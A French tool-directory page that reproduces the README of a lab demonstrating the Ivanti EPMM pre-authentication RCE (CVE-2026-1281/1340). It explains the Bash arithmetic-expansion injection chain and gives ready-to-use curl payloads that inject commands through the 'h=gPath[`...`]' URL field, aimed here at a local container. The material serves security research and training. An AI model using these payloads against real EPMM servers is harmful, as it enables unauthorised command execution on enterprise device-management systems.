Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Une simple application de démonstration qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité. | Kitploit
Outils/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Une simple application de démonstration qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité.

Voir le dépôt
312il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cible factice RCE pré-authentification Ivanti EPMM

Une application de démonstration simple qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité.

Présentation de la vulnérabilité

Cette vulnérabilité exploite le comportement de l'expansion arithmétique de Bash. Lorsqu'une variable contenant une référence à une autre variable est utilisée dans un contexte arithmétique, et que cette variable référencée contient un index de tableau avec substitution de commande, la commande est exécutée.

La chaîne d'exploitation

  1. La requête contient st=theValue (chaîne littérale « theValue » avec un remplissage)
  2. La requête contient h=gPath[\commande`]` (commande dans l'index du tableau)
  3. Le script Bash analyse les paires clé=valeur dans une boucle, en mettant à jour theValue à chaque itération
  4. gStartTime est défini sur la chaîne littérale "theValue"
  5. Après la boucle, theValue contient gPath[\commande`]`
  6. Lorsque [[ ${currentTime} -gt ${gStartTime} ]] est évalué :
    • ${gStartTime} → "theValue" (chaîne)
    • Le contexte arithmétique traite theValue comme une référence de variable
    • theValue → gPath[\commande`]`
    • L'index du tableau déclenche la substitution de commande → RCE !

Démarrage rapide

# Construire et démarrer le conteneur
docker-compose up --build -d

# Vérifier qu'il fonctionne
curl http://localhost:8180/health

Tester la vulnérabilité

1. Test de création de fichier

Créez un fichier pour prouver l'exécution de commande :

# Charge utile encodée en URL : id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Vérifier si le fichier a été créé
cat artifacts/poc

2. Test basé sur le temps

Vérifiez avec une commande sleep :

# La réponse devrait prendre ~5 secondes
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. Exécution de commande personnalisée

# Écrire un contenu personnalisé
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

Structure de l'URL

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMANDE%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ Charge utile : gPath[`COMMANDE`]
                               │      │              └─ Horodatage de fin (10 chiffres quelconques)
                               │      └─ CRITIQUE : « theValue » littéral + 2 espaces (10 caractères au total)
                               └─ Index de clé (valeur quelconque)

Débogage

# Afficher les journaux du conteneur
docker-compose logs -f

# Ouvrir un shell dans le conteneur
docker exec -it ivanti-epmm-vuln /bin/bash

# Vérifier les journaux d'erreur nginx
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

Nettoyage

docker-compose down
rm -rf artifacts/*

Références

  • Article de blog WatchTowr Labs

Avertissement

Ceci est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.

Télécharger l’outil